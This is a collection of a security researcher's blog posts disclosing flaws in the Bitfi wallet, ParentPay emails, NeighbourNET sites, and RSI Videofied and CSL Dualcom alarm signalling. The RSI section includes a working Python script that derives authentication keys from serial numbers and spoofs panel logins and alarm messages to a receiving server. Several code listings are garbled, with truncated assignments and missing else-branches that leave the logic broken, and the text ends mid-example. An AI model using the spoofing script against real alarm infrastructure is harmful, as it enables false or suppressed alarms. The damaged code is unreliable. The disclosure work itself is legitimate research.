Bitfi against the competition – updated 2019

Bitfi’s core concept is that the wallet itself does not “store” your private keys – it calculates them on the fly.

It is acting as a simple key-derivation function. A salt (8 characters) and a phrase (30 characters or more) are passed through a simple algorithm to generate longer private keys.

The Bitfi takes a short key and “stretches” it into a longer key.

There is no secret sauce in a Bitfi – you don’t need that user’s Bitfi (or any Bitfi, for that matter), the user’s email address, password, access to the Bitfi dashboard or anything else. All you need is the salt and phrase. With those, funds can be accessed.

The Competition

We need to see how others have tried to implement hardware wallets. Most of them don’t work like the Bitfi.

  • A private key is generated using a random number generator in the wallet.
  • The private key is displayed on the wallet itself. The user writes it down and stores it safely as a backup.
  • This is the only time the key is output from the wallet.
  • From this point onward, the wallet acts as black box, signing any transactions that are sent to it. There is no need to enter the private key, and the private key is never output from the device.

This is probably the most important security feature of a hardware wallet: the private key is locked away in a black box with a limited attack surface and on a device that has a single use. The private key never needs to exist on your malware-infected, general-purpose laptop, and is therefore much less likely to be compromised.

There are still some obvious security issues that need to be handled.

  1. If the wallet is stolen, it could be used to sign transactions. To prevent this, the wallet uses a PIN to guard access to the black box. Without this PIN, the device will not function. Brute-force protection makes it infeasible to try all combinations, preventing the private key from being accessed.
  2. If the wallet is stolen, the private key could be read out from the memory inside the device. To mitigate this, the keys are stored on internal flash on microcontrollers. There is no easy way to read the keys out without advanced hardware attacks.
  3. The wallet simply signs transactions that are sent to it. A user may be expecting to sign “send 2BTC to Bob”. This could be modified to be “send 200BTC to Eve”. To prevent this, the wallet displays the transaction details and asks the user to confirm using buttons on the wallet.
  4. The wallet will run firmware, which can be updated. A malicious firmware could be loaded, allowing the private key to be read, or hide modified transactions from the user. Signed firmware and secure boot are used to protect against this. Only the vendor can generate firmware that the wallet will accept.

These protections are not perfect; a determined and dedicated attacker can still circumvent them. This is a key point: all we need to do is raise the bar high enough that most attackers don’t succeed.

Here are some example attacks from wallets:


Bitfi is very different to those hardware wallets.

Each and every time you need to sign a transaction, the user enters their entire salt and phrase via the touchscreen display.

The wallet then derives the private key. There is no need for the wallet to store the private key long-term.

Bitfi proudly state that this means there is “nothing to hack” – if there are no keys stored on the device, how can a hacker possibly get the keys?

At first glance, this seems sensible. But if you dig a bit deeper, you quickly realise how broken this concept is. I’m going to describe the attacks we have developed against Bitfi, and how they stack up against competitors.

Cold-boot attack


With USB access to a stolen Bitfi, the salt, phrase and keys can be read from the RAM. This is called a “cold boot attack“.

The data persists in RAM for days whilst the device has a battery in it.

This only requires a USB cable and a laptop. The wallet casing does not need to be opened, and no specialist hardware is required. No skill is required as the attack is entirely scripted.

The attack takes less than a couple of minutes, and the device works as normal afterwards. It is feasible for this to be carried out during luggage X-ray at an airport, and returned to the user.

The attack has never bricked the Bitfi and has worked extremely reliably.

There is no requirement to cool the device to perform the attack.

Bitfi recommend the use of “diceware” passwords, which greatly facilitates the recovery of the phrase from memory. The use of a list of dictionary words means there is a lot of redundancy, which in turn means that the memory can degrade significantly and we can still recover the phrase.

Bitfi did not inform their customers of this issue.

Update – Summer 2019 – It has been claimed that the issue has been fixed, but no evidence has been provided, and no independent testing has been carried out.


To protect yourself, the battery must be removed from the wallet after use. To ensure the keys are no longer in memory, the wallet must be left powered down for at least an hour. During this period, you must make sure no one physically accesses the device.


The RAM on most other hardware wallets is protected from access via USB or debug protocols such as JTAG or SWD. We have observed no such protections on the Bitfi.

Even with this considered, most other wallets take steps to “zeroise” or wipe the memory immediately after it is used. This limits the window over which cold-boot attacks could be carried out. This is either not performed, or is wholly ineffectual on the Bitfi.

There are no published cold-boot attacks against other hardware wallets.

Malicious Firmware


With USB access to a Bitfi, the firmware can be modified so that the salt, phrase and keys are sent to an attacker the next time they are entered by the user. This permits “evil maid attacks” as well as supply chain tampering.

This only requires USB access to the device. The wallet casing does not need to be opened, and no specialist hardware is required. The attack could be carried out if the Bitfi is connected to a compromised charger or laptop. Using this vector, the attacker never requires physical access to the device.

The attack takes less than a minute, and there are no mechanisms for the user to detect the modification. It is feasible for the attack to be carried out by anyone with access to the device for a short period, either before (supply chain tampering) or after (evil maid) the Bitfi enters possession of a user.

This attack could happen before you receive the device, when going through airport security, or when it is left unattended at home.


There are no mechanisms for a user to check if the device has been tampered with at a firmware level. This has been confirmed by Bitfi developers.

A user could assume that the device is trusted as received from Bitfi. As long as the device does not enter the hands of an attacker, and is never connected to an untrusted USB power source, it could be considered secure from this specific attack.

Assuming the device is trusted as received is therefore high-risk.


The use of signed firmware updates and secure boot mean that other wallets cannot have their firmware modified in less than a minute using just a USB connection.

There are still other attacks that hardware wallets are vulnerable to.

The wallet can be stolen and replaced in entirety. The replacement will send the PIN to the attacker, allowing them to unlock the stolen wallet and access funds. The user would detect the issue as their key would not be on the replacement wallet, and they would not be able to access funds.

The wallet can be accessed, modified with a hardware implant, and returned. It could harvest the PIN, modify transactions, or spoof integrity checks. This attack is significantly more challenging that simply plugging the device into USB, and to-date, no feasible attack has been shown against any of the popular wallets.

Shoulder surfing


The entire salt and phrase need to be entered into the Bitfi each time it is used. This is entered using a conventional touchscreen, with a QWERTY keyboard, and displayed on the screen clearly.

It is entirely possible to read the salt and phrase from the screen and then use this to steal funds from the user.

Even without direct view of the screen, the finger position when typing allows characters to be inferred. The use of dictionary words means that even if certain characters cannot be determined, they can be inferred from those that can be seen.

As the salt and phrase contain all the information required to steal funds, a user may be entirely unaware that they have been compromised. The attacker can delay the attack until an opportune moment.


The Bitfi wallet cannot be used when someone can observe the device.


Whilst the PIN can be shoulder-surfed on other devices, an attacker still requires access to the wallet itself to obtain the key. This provides a significant additional layer of security.

Some other wallets mitigate the risk of shoulder surfing by randomising PIN layout.

Key entropy


The Bitfi device allows users to choose their own salt and pass phrase. Multiple studies have shown users are very bad at choosing and storing passwords, and there is no reason to assume that Bitfi will differ.

It was discovered that one user even used the sample phrase from the Bitfi instructions.


A salt and phrase of good quality must be used.


Competing wallets encourage the use of keys that are randomly generated using a good source of entropy, removing the human aspect.

Something-you-have and something-you-know


Bitfi only requires the salt and phrase, and nothing else. Wallets can be used interchangeably (at least, at a functional level – this is not recommended for security reasons).

If your salt and phrase leak via any means, an attacker has access to your funds. There are no flags to signal this.

This is termed single-factor authentication.


There are no good means to solve this issue.


Other wallets support passphrases as part of the BIP39 specification. To use the wallet, you need both the key stored in the wallet itself, and a passphrase that is stored elsewhere. This is something-you-have (the key on the wallet) and something-you-know (the phrase).

Use of a passphrase with BIP39 significantly elevates the security above that of a Bitfi.


The Bitfi wallet is less well protected than competing hardware wallets. If you ever let anyone else have access to it, ever connect it to an untrusted device, or use it in a public place, you are not safe.

Users of Bitfi must take significant and limiting steps to mitigate the risk they are exposed to.

Even ignoring Bitfi’s dishonest behaviour, the product has little to recommend it over any other wallet.

Can these issues be fixed?

We aren’t really sure.

There is no hardware root of trust on the Bitfi. This must be burned into the device before it leaves the vendor’s possession for it to be secure. Without this, secure boot cannot be implemented well.

The use of external RAM on a commodity chipset (without RAM encryption) will always leave the keys exposed, no matter how well you try to wipe them from software.

Android is a poor choice of operating system. It makes wiping memory very challenging – the salt and phrase are in tens of locations. It also makes limiting the attack surface very, very hard.

The Bitfi hardware wallet isn’t “unhackable”

Earlier this week, cryptocurrency news was full of stories about a new hardware wallet: the Bitfi.

What makes this one any different?

John McAfee claims it is “unhackable”. Not just “harder to hack”, but “unhackable”.

That’s a bold claim. They know it’s a bold claim, so they have set a bounty.

Sounds great, no?


The bounty deliberately only includes only one attack: key recovery from a genuine, unaltered device. And the device doesn’t store the key.

The only way to win the bounty is to recover a key from a device which doesn’t store a key.

There are many, many more attacks such a device is vulnerable to. The most obvious one: modifying the device so that it records and sends the key to a malicious third party. But this is excluded from the bounty.

Why is this?

Because the bounty is a sham. When it lays unclaimed, Bitfi can say “our device is unhackable”. What it actually means is “our device is not vulnerable to one specific attack”.

I’m going to put a challenge to them.

If their device is unhackable, then change your bounty terms:

  • A trusted intermediary is chosen e.g. a lawyer or judge.
  • We provide the trusted intermediary with three Bitfi devices, a laptop computer and a WiFi access point.
  • The trusted intermediary puts $1,000,000 directly onto each Bitfi device, using the laptop and WiFi access point we have provided.
  • They must follow the publicly available documentation, without interference from anyone.

These are much stronger security goals to meet, and much more accurately emulate the real world.

If Bitfi won’t change the terms, it’s clear to me that they don’t stand behind their claims that the device is unhackable.


Win a prize! If you log in using the link in this email!!!!

Email from Parentpay

Email from Parentpay

On 25th August, I received the above email purporting to be from ParentPay. ParentPay is an online payment system designed for use by schools – you can book and pay for school dinners, library fines, school trips etc.

I am a user of the application, but I’ve only casually (and observationally) looked at the security of their main web application. I have no complaints, although the SSL configuration is less than optimal.

This email looks like a textbook phishing email. I had to spend some time confirming it was genuine, and was only really convinced after they tweeted about the same competition.

Why does it look like a phishing email?

  1. The sender’s email address is not on the domain – it is This teaches your users to accept that any email containing the word parentpay is genuine.
  2. You are tempting users with vouchers in return for logging in. This is a standard technique used by phishers.
  3. Amazon is not capitalised. Spelling and grammar mistakes are common in phishing emails.
  4. The login link labelled “Login to ParentPay” takes us to the ParentPay login page. In a phishing email, it would take us to a malicious site that may harvest our details or deliver malware. Conditioning users to login via links sent in email is a bad idea.
  5. The login link directs us to the domain, which redirects to ParentPay. Teaching users to follow links to third-party sites to login is a monumentally bad idea – a number of attacks can be carried out like this including a plain phishing page, tabnabbing etc.

Please don’t send emails like this – it doesn’t just impact the security of your site. Conditioning users to trust emails like this goes against a lot of user awareness training, regardless of which site they are accessing.

Multiple vulnerabilities in NeighbourNET platform

NeighbourNET (caution, awful Flash splash page) is a platform used to power a number of local community websites in London:


It would be fair to say the visual presentation of the sites hints at there being security problems.

1. No passwords required for login

When you login to the site, all you need is an email address. There are no passwords at all.

Screen Shot 2016-07-10 at 09.58.44

2. Posting name can be spoofed

The posting name and email is passed as a parameter when posting a message, and it can be altered to any value you want.

Screen Shot 2016-07-10 at 10.10.48

This allows you to post as anyone else on the forum.

Screen Shot 2016-07-10 at 10.14.52

3. No cross-site request forgery protection

No requests to the site have any cross-site request forgery protection.

A user can visit another website, and that website can cause them to carry out actions on the site, such as posting messages.

4. Allows embedding of untrusted third-party content

The site embeds it’s own content using a URL passed as a GET parameter.

The source of this content is not whitelisted or validated, so you can just embed your own content. This has only been tested with plain HTML, but if JavaScript, Flash or other content could be embedded, this would lead to cross-site scripting or malware delivery to users.

Screen Shot 2016-07-10 at 10.41.11


A mess of security issues. Considering that local councillors use these sites to communicate with the public, allowing impersonation is a serious issue.

Disclosure timeline:

The operators of the sites were informed on 4th May, so after 60 days they are being disclosed.

03/05/2016 – first email sent to NeighbourNET

04/05/2016 – email response received, issues sent by email, receipt acknowledged

17/05/2016 – chase on further response

14/06/2016 – chase on further response and state disclosure date of around 04/07/2016. Email acknowledged.

17/06/2016 – get response from vendor:

Chatted to the development team about the issues you raised.

They acknowledged that you have identified some potential security holes but they have existed for a long time without ever been exploited and there seems little incentive for anyone to try to do so.

We have been for some time now working on completely overhauled site architecture and whilst this project has been ongoing for sometime we are now talking in terms of months rather than years before implementation. This would close these security holes and others.



How could CSL Dualcom have handled my report better?

The release of the CSL Dualcom report last week has caused quite a stir in the security industry. With just shy of 60,000 page views, thousands of tweets, many forum discussions, and one particularly lively thread on Reddit, many people in both the security and IT industries have read the work. Two clear comments have been made many times:

  1. Yes, this crypto is really bad.
  2. How did CSL Dualcom mess up handling this so badly?

If you want to fix the crypto, there are many places you can go.

If you want to handle vulnerabilities better though, I hope I can give you some advice. I’ve now dealt directly with CSL, Risco, Visonic, Dedicated Micros, Samsung, Motorola, Texecom and WebWayOne and think that I have learnt a lot about the disclosure process.

Make reporting issues easy

The first step of reporting a vulnerability is contacting someone. At worst, this requires multiple emails, tweets, phone calls, and LinkedIn prodding. Some companies have taken several months to respond, and when they do, they ask questions to check that you are eligible to receive support. Others have responded and dealt with issues in under 24 hours.

Make this easy. Have a page on your site, ideally with an email address Have an auto-responder on this email address, informing the reporter what the next steps are. Get back to them quickly.

Have a vulnerability disclosure policy

None of the vendors had a vulnerability disclosure policy. This means the reporter has no idea how their work will be handled – are they going to be welcomed with open arms? Threatened with legal action? Can they disclose the vulnerability?

You should have a simple and fair vulnerability disclosure policy. We realise you are dealing with potentially legacy products that are hard to update, so give yourselves a long period of time to deal with issues.

Allow researchers to disclose the issues once fixed or mitigated. This gives both parties benefits – you get free security testing done, the reporter gets reputation, and customers can see how responsive you are.

Pass it by your solicitor to make sure you are not digging your own grave.

Do not require a non-disclosure agreement

As an independent security consultant, it is essential that I do not go around signing NDAs willy-nilly.

They provide me with no benefit. There is virtually nothing that a vendor can disclose about me, but I have a lot I can disclose about them.

At the same time, they put me at risk. The vendor has little legal risk – what can I sue them for, if they have nothing to disclose? Equally, they can sue me as I hold a lot of secrets.

NDAs prevent me discussing work with existing customers. If I sign an NDA with CSL, I then can’t advise my other customers in detail about CSL’s mistakes.

Do not be threatening

Do not make any implied or actual threats, especially legal ones.

You can be in absolutely no doubt that if one person can find the issues, so can another. And that other person may not be so amenable.

Google “Streisand Effect” and “Illegal Prime” if you want to find out more about why trying to suppress things rarely works.

Work with the researcher

In more than a few cases, the vendor made fixes for an issue, but the fixes also had problems. In some cases, they even make problems worse.

A prime example of this is reporting a backdoor password, and the vendor simply changes the backdoor password…

Check with the researcher if the fix actually solves the problem, or you will just end up with multiple vulnerabilities being disclosed.

Realise that you are Internet connected

15 years ago, signalling devices were neatly partitioned from the Internet. They had dedicated communications channels and infrastructure.

As devices added IP, they were treated as signalling devices that happen to have an IP side. They were still treated as alarm products, and not Internet connected devices. The threat model had stuck at “Billy Burglar”.

Nowadays, this attitude is still common. But devices have changed – most of them connect to or via the Internet. You need to include “Hacker” into your threat modelling. Fundamentally, a lot of attacker don’t even care if you device is an alarm – they just want another box that is able to generate traffic or send spam as part of a botnet.

You need to involve people who are versed in information security.

Avoid ending up with disclosure handled by CERT/CC

Don’t get me wrong – I love CERT/CC and what they do, but it is disasterous for a company to end up with a vulnerability on their product there. It sends a very strong signal out to the IT community that the company has had ample chance to respond to an issue and they haven’t. It also gives massive exposure to issues – over 1000 tweets showed up within 6 hours of the CSL issue being disclosed.

Work with researchers to avoid this.





Multiple serious vulnerabilities in RSI Videofied’s alarm protocol

RSI Videofied are a French company that produce a series of alarm panels that are fairly unique in the market. They are designed to be battery powered and send videos from the detectors if the alarm is triggered. This is called video verification. They are frequently used on building sites and disused buildings.

They send data over either GPRS (mobile) or IP. Whilst reverse engineering as part of competitor analysis for a client, I found a large number of vulnerabilities in the protocol they use to communicate.

In summary, the protocol is so broken that it provides no security, allowing an attacker to easily spoof or intercept alarms.

As appears to be the norm in the physical security world, the vendor failed to respond over the course of 6 weeks, so this was taken to CERT/CC for disclosure. They are due for disclosure 30 November 2015. CERT/CC have released their report.

The issues were found in their newest W Panels in mid-2015.

The following CVEs have been assigned:

  • CWE-321: Use of Hard-coded Cryptographic Key – CVE-2015-8252
  • CWE-311: Missing Encryption of Sensitive Data – CVE-2015-8253
  • CWE-345: Insufficient Verification of Data Authenticity – CVE-2015-8254

RSI Videofied have stated to CERT/CC that this is fixed in version 3 of their protocol which is currently being rolled out.

Weak authentication

When the panel initially communicates with the receiving server, there is an authentication handshake (R is received by panel, S is sent by panel)

R: IDENT,1000.
S: IDENT,EA00121513080139,2.
R: VERSION2,0.AUTH1,9301D4E13A1CDF51F873C790AFD602AF.
S: AUTH2,91A4E381AF21ECEB010FA0EE83021D48,D8717F423736A1F01510D25E919A3ED2.
S: AUTH_SUCCESS,1440,1,20150729232041,5,2,E2612123110,0,XLP052300,0,27F7.ALARM,

This looks like some kind of challenge/response. EA00121513080139 is the panel’s serial number. 1440 is the account number for that particular panel.

Brief entropy analysis of the long strings in AUTH1, AUTH2, and AUTH3 showed them to be random.

A Python script was created to mimic the panel.

It was noted that if the serial number was altered, the response was different:

R: IDENT,1000
S: IDENT,EA00121513080136,2
R: SETKEY,10680211105310035016110010318802
R: VERSION,2,0 AUTH1,D5689F494D81ECA07E72CC0F3459ED4E

It appears that the first time a particular server sees a serial number, it informs the panel of the key used for the challenge/response. If we then attempt to connect again, the key is not shown to us.

It was then seen that connecting the panel to a new server at a different alarm receiving centre delivered exactly the same key. This means that the key is deterministic. It also means that to obtain the key for any given panel, all we need to do is send the serial number to another Videofied server (of which there are many).

However, we can go further than this. Notice that the key delivered above has a lot of common numbers with the serial number. It appears that the key is just a mixed up serial number:

R: IDENT,1000
S: IDENT,0000000000000000,2
R: SETKEY,00000000000010000000000000010000 VERSION,2,0 A
R: AUTH1,6587DA1323597F4AC986936BAF20102B

R: IDENT,1000
S: IDENT,0000000000000020,2
R: SETKEY,00000000000210000000000000210000
R: VERSION,2,0 AUTH1,0A79588F06FEB594D153237230BA0D61

R: IDENT,1000
S: IDENT,0123456789ABCDEF,2
R: SETKEY,40FB05D68C7E10A97A4FD6C080E1BB05
R: VERSION,2,0 AUTH1,D4F98DF37EF53F52505599D833484658

This means that we can trivially determine the key used for authentication using the serial number that is sent in the plain immediately beforehand.

The challenge response protocol is as follows:

Server: Random server challenge
Panel:  AES(Random server challenge, key) | Random panel challenge
Server: AES(Random panel challenge, key)

Now that we have the key, it is very easy for us to spoof this.

import socket
from Crypto.Cipher import AES
from Crypto import Random

# 4i Security's server and port
rsi_server = ''
rsi_port = 888
# This is the valid alarm serial
serial = 'A3AAA3AAA2AAAAAA'

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((rsi_server, rsi_port))

# Open a connection to the server should see
# IDENT,1000
print 'R:',s.recv(1024)

# This is the valid serial number from the board
msg = 'IDENT,' + serial + ',2\x1a'
print 'S:', msg

# Should receive
print 'R:', s.recv(1024)

# AUTH1,<16 byte challege>
auth1 = s.recv(1024)
print 'R:', auth1

# Split out challenge
challenge = auth1.split(',')[-1][:-1]
print 'Challenge:', challenge

# The key is just a jumbled up serial.
# This means the key is entirely deterministic and can be guessed from one sniffed packet.
key = serial[4] + '0' + serial[15] + serial[11] + '0' + serial[5] + serial[13] + serial[6] + serial[8] + serial[12] + serial[7] + serial[14] + '1' + '0' \
    + serial[10] + serial[9] + serial[7] + serial[10] + serial [4] + serial[15] + serial[13] + serial[6] + serial[12] + '0' + serial[8] + '0' + serial[14] + \
    '1' + serial[11] + serial[11] + '0' + serial[5]

cipher ='hex'))

# Encrypt in EBC mode
response = cipher.encrypt(challenge.decode('hex')).encode('hex').upper()

print 'Response:', response

# Generate our own random challange
challenge ='hex').upper()

# Send back response in form:
# AUTH2,<16 byte response>,<16 byte challenge>
msg = 'AUTH2,' + response + ',' + challenge + '\x1a'

print 'S:', msg

# Calculate the expected response
print 'Expected Response', cipher.encrypt(challenge.decode('hex')).encode('hex').upper()

# This should be the encrypted response from the server
print 'R:', s.recv(1024)

# Send capture status message
msg = 'AUTH_SUCCESS,1440,1,20150729232041,5,2,E2612123110,0,XLP052300,0,27F7\x1aALARM,1932\x1a'
print 'S:', msg

print s.recv(1024)

Clearly this is not good.

Authentication decoupled from identity

The above authentication ensures that a given panel with a serial number knows the key. Even if this key was secret and non-deterministic, it is entirely decoupled from the identity of the account. The account is the piece of information identifying the panel to the alarm receiving centre.

Notice that in the above authentication, the account number 1440 is not encrypted or linked to the panel serial:

R: IDENT,1000.
S: IDENT,EA00121513080139,2.
R: VERSION2,0.AUTH1,9301D4E13A1CDF51F873C790AFD602AF.
S: AUTH2,91A4E381AF21ECEB010FA0EE83021D48,D8717F423736A1F01510D25E919A3ED2.
S: AUTH_SUCCESS,1440,1,20150729232041,5,2,E2612123110,0,XLP052300,0,27F7.ALARM,

It turns out that we can simply re-program the panel to use site 1441, and it will report into the alarm receiving centre as account 1441. There is no tie to the serial number, and no authentication of the account number.

Other basic crypto failings

Beyond the authentication being totally broken, the protocol suffers from further basic issues:

  • Nothing is encrypted – anyone can view the content of the messages, including the videos.
  • There is no integrity protection such as a message authentication code or even a checksum, meaning that it is easy for messages to be altered deliberately or by accident.
  • There are no sequence numbers, which means that messages can be replayed and there is no end-to-end acknowledgement of alarm reception


The RSI Videofied system has a level of security that is worthless. It looks like they tried something and used a common algorithm – AES – but messed it up so badly that they may as well have stuck with plaintext.



Questions for CSL Dualcom

When CSL made their statement last Friday, it was noticeable that they didn’t actually claim that any of my report was false. To me, that implies that the content of the report is true.

CSL should be answering questions right now, but are maintaining silence.

If you are a big customer of CSL, I would be asking:

  1. What encryption methods do your new devices, the Gradeshift and DigiAir, use?
  2. How often are the keys changed on these devices?
  3. If there was a serious security issue requiring the firmware to be updated, who pays for it?
  4. Do these devices have SMS controls? If so, what is the PIN and how do I change it?
  5. Are any of the device in my estate using the encryption mentioned in the report?

I suspect answers won’t be forthcoming.



CSL Dualcom CS2300-R signalling unit vulnerabilities

Today, CERT/CC will be disclosing a series of vulnerabilities I have discovered in one particular alarm signalling product made by CSL Dualcom – the CS2300-R. These are:

  • CWE-287: Improper Authentication – CVE-2015-7285
  • CWE-327: Use of a Broken or Risky Cryptographic Algorithm – CVE-2015-7286
  • CWE-255: Credentials Management – CVE-2015-7287
  • CWE-912: Hidden Functionality – CVE-2015-7288

The purpose of this blog post is to act as an intermediate step between the CERT disclosure and my detailed report. This is for people that are interested in some of the detail but don’t want to read a 27-page document.

First, some context.

What are these CSL Dualcom CS2300-R devices? Very simply, they are a small box that sits between an intruder alarm and a monitoring centre, providing a communications link. When an alarm goes off, they send a signal to the monitoring centre for action to be taken. They can send this over a mobile network, normal phone lines, or the Internet.


They protect homes, shops, offices, banks, jewellers, data centres and more. If they don’t work, alarms may not reach the monitoring centre. If their security is poor, thousands of spoofed alarms could be generated. To me, it is clear that the security of these devices must be to a reasonable standard.

I am firmly of the opinion that the security of the CS2300-R devices is very poor. I would not recommend that new CSL Dualcom signalling devices are installed (regardless of model), and I would advise seeking an alternative provider if any were found on a pen-test. This is irrespective of risk profile of the home or business.

If you do use any Dualcom signalling devices, I would be asking CSL to provide evidence that their newer units are secure. This would be a pen-test carried out by an independent third-party, not a test house or CSL.

What are the issues?

The report is long and has a number of issues that are only peripheral to the real problems.

I will be clear and honest at this point – the devices I have tested are labelled CS2300-R. It is not clear to myself or others if these are the same as CS2300 Gradeshift or any other CS2300 units CSL have sold. It is also not clear which firmware versions are available, or what differences between them are.

The devices were tested in the first half of 2014.

CSL have not specifically commented on any of the vulnerabilities. On the 20 November they finally made a statement to CERT.

Here is a summary of what I think is wrong.

1. The encryption is fundamentally flawed and badly implemented

The encryption cipher used by the CSL devices is one step above the simple Caesar Cipher. The Caesar Cipher is known and used by many children to encrypt messages – each character is shifted up or down by a known amount – the “key”. For example, with the key of “4”, we have:

        Key: 444 44444 44444 444 444444 4444 444 4444 444

CSL’s encryption scheme goes one step further, and uses a different shift as you move along the message. It’s a hybrid between a shift cipher and a polyalphabetic substitution cipher.

The mechanism the algorithm uses is like so:

        Key: 439 83746 97486 128 217218 9217 914 9127 197

The first character is shifted up by 4, the next by 3, then 9, 8, 3 etc. This is simplified, but not by much.

Here it is as a simple Python script:

iccid = "89441000300637117619"
chipNumber = "510021"
status = "15665555555555567"
# This is the key stored in flash at x19da
keyString = "0f15241e0919030d2a050e2329132c1014171b2726020c072201212d1a1c120a281f0b1d04250f1816112e2b2006082f41542a49503d"
# Change the string into a list of integers
key = [ord(x) for x in keyString.decode("hex")]

# encrypts a string with a startingVariable
def encrypt(stringToEncrypt, startingVariable):
    if startingVariable < 52:
        startingVariable -= 1
        startingVariable -= 51
    encryptedString = ""
    for y in stringToEncrypt:
        y = ord(y)
        # Input character constraint
        if y < 0x41:
            y -= 0x30
            y -= 0x37
        # Add value from key to character
        y += key[startingVariable]
        # Output constraints
        if y < 0x25:
            if y < 0x1B:
                y += 0x40
                y += 0x15
            y += 0x3C
        startingVariable += 1
        # Keep startingVariable within bounds - oddly smaller bounds than initial check
        if startingVariable > 47:
            startingVariable = 0
        encryptedString += chr(y)
    return encryptedString
def decrypt(stringToDecrypt, startingVariable):
    if startingVariable < 52:
        startingVariable -= 1
        startingVariable -= 51
    decryptedString = ""
    for y in stringToDecrypt:
        y = ord(y)
        if y < 0x61:
            if y < 0x41:
                y -= 0x15
                y -= 0x40
            y -= 0x3C
        y -= key[startingVariable]
        if y < 0x0a:
            y += 0x30
            y += 0x37
        startingVariable += 1
        if startingVariable > 47:
            startingVariable = 0
        decryptedString += chr(y)
    return decryptedString
stringStatus = iccid + "A" + chipNumber + status
startingVariable = 52

encryptedString = encrypt(stringStatus, startingVariable)
print "   Status: %s" % stringStatus
print "Encrypted: %s" % encryptedString

It would be fair to say that this encryption scheme is very similar to a Vigenère cipher, first documented in 1553, even used fairly widely until the early 1900s. However, today, even under perfect use conditions, the Vigenère cipher is considered completely broken. It is only used for teaching cryptanalysis and by children for passing round notes. It is wholly unsuitable to use for electronic communications across an insecure network.

Notice that I said the Vigenère cipher was broken “even under perfect use conditions”. CSL have made some bad choices around the implementation of their algorithm. The cipher has been abused and is no longer in perfect use conditions.

An encryption scheme where the attacker knows the key and the cipher is totally broken – it provides no protection.

And CSL have given away the keys to the kingdom.

The key is the same for every single board. The key cannot be changed. The key is easy to find in the firmware.

An encryption scheme where the attacker knows the key and the cipher is completely and utterly broken.

Beyond that, CSL make a number of elementary mistakes in the protocol design. Even if the key is not known and fixed, it could easily be recovered from observing a very limited number of sent messages. The report details some of these mistakes. They aren’t subtle mistakes- they are glaring errors and omissions.

I cannot stress how bad this encryption is. Whoever developed it doesn’t even have basic knowledge of protocol design, never mind secure protocol design. I would expect this level of work to come from a short coursework from A-level IT students, not a security company.

2. Weak protection from substitution

The CS2300-R boards use two pieces of information to identify themselves. One is the 20-digit ICCID – most people would know this as the number on a SIM card. The other is a 6-digit “chip number”.

ICCID on case

Both of these are sent in each message – the same message which we can easily decrypt. This leads to an attacker being able to easily determine the identification information, which could then be used to spoof messages from the device.

Beyond that, installers actually tweet images of the boards with either the ICCID or chip number clearly visible: 1, 2, 3.

This is a very weak form of substitution protection. There are many techniques which can be used to confirm that an embedded device is genuine without using information sent in the open, such as using a message authentication code or digital signature.

3. Unable to perform firmware updates over-the-air

It is both presumptuous and foolhardy to assume that the device you deploy on day one will be free of bugs and security issues.

This is why computers, phones, routers, thermostats, set-top boxes, and even cars, allow for firmware updates over-the-air. Deployed devices can be updated in the field, after bugs and vulnerabilities have been fixed.

It has been considered – for many years – that over-the-air firmware updates are an absolutely vital part of the security of any connected embedded system.

The CS2300-R boards examined have no capability for firmware update without visiting the board with a laptop and programmer. No installers that I questioned own a programmer. The alarm system needs to be put into engineering mode. The board needs to be removed from the alarm enclosure (and, most of the time it is held in with self-adhesive pads, making this awkward). The plastic cover needs to be removed. The programmer needs to be connected, and then the firmware updated. Imagine doing that for 100 boards, all at different sites.

Saleae Logic

At this point, we need to remember that CSL claim to have over 300,000 deployed boards.

If we imagine that it takes a low estimate of 5 minutes to update each of the 300,000 boards, that is over 1000 man-days of effort to deploy an update. If you use a more realistic time estimate, the amount of effort becomes scary.

This means that any issues found cannot and will not be fixed on deployed boards.

CSL have confirmed that none of their devices support over-the-air firmware updates.

CSL have given away the keys to the kingdom and cannot change the locks.

A software development life-cycle that has a product that cannot be updated fosters a do-not-care attitude. Why should CSL care about vulnerabilities if they cannot fix them? What would be their strategy if there was a serious, remotely exploitable vulnerability was found?

4. I do not believe the CS2300-R boards are standards compliant

One of the standards governing alarm signalling equipment is EN50136. These are a series of lengthy documents that are unfortunately not open access.

Only a small part actually discusses encryption and integrity. Even when they are discussed, it is in loose terms.

CSL have stated, in reference to my report:

As with all our products, this product has been certified as compliant to the required European standard EN-50136

Unfortunately, CSL will not clarify which version of the standards the CS2300-R devices have been tested to.

I will quote the relevant section from EN50136-1-5:2008:

To achieve S1, S2, I1, I2 and I3 encryption and/or hashing techniques shall be used.

When symmetric encryption algorithms are used, key length shall be no less than 128 bits. When other algorithms are deployed, they shall provide similar level of cryptographical strength. Any hash functions used shall give a minimum of 256 bits output. Regular automatic key changes shall be used with machine generated randomized keys.

Hash functions and encryption algorithms used shall be publicly available and shall have passed peer review as suitable for this application.

These security measures apply to all data and management functions of the alarm transmission system including remote configuration, software/firmware changes of all alarm transmission equipment.

There are newer versions of the standard, but they are fundamentally the same.

My interpretation of this is as follows:

Cryptography algorithms used should be in the public domain and peer reviewed as suitable for this application.

We are talking DES, AES, RSA, SHA, MD5. Not an algorithm designed in-house by someone with little to no cryptographic knowledge. The cryptography used in the CS2300-R boards examined is unsuitable for use in any system, never mind this specific application.

When the algorithm was sent as a Python script to one cryptographer, they assumed I had sent the wrong file because it was so bad.

The next I sent it to said:

I’ve never thought I’d see the day that someone wrote a variant on XOR encryption that offered less than 8 bits of security, but here we are.

We’re talking nanosecond scale brute force.

Key length should be 128 bits if a symmetric algorithm is used.

A reasonable interpretation of this requirement is that the encryption should provide strength equivalent to AES-128 from brute-force attacks. AES-128 will currently resist brute-force for longer than the universe has existed. This is strong enough.

The CSL algorithm is many orders of magnitude less secure than this. Given the fixed mapping table, a message can be decrypted in the order of nanoseconds.

Regular automatic key changes shall be used with machine generated randomised keys

Regular is obviously open to interpretation. There is a balance to be struck here. You need to change keys often enough that they cannot be brute-forced or uncovered. But key exchange is a risky process – keys can be sniffed and exchanges can fail (resulting in loss of communications).

Regardless, the CS2300-R boards have no facility at all for changing the keys. The key is in the firmware and can never change.

All data and management functions including remote configuration should be protected by the encryption detailed.

The CS2300-R have a documented SMS remote control system, protected by a 6-digit PIN. This is not symmetric encryption, this is not 128-bit, this is not peer-reviewed.

This is a remote control system protected by a short PIN (and it seems that PIN is often the same – 001984 – and installers don’t have the ability to change it).

Data should be protected from accidental or deliberate alteration

There is nothing in the protocol to protect against alteration. There is no MAC, no signature. Nothing. Not even a basic checksum or parity bit.

The message can easily be altered by accident or by malice. Look at this example:

   Status: 89441012345678901237A1234561111111111111117
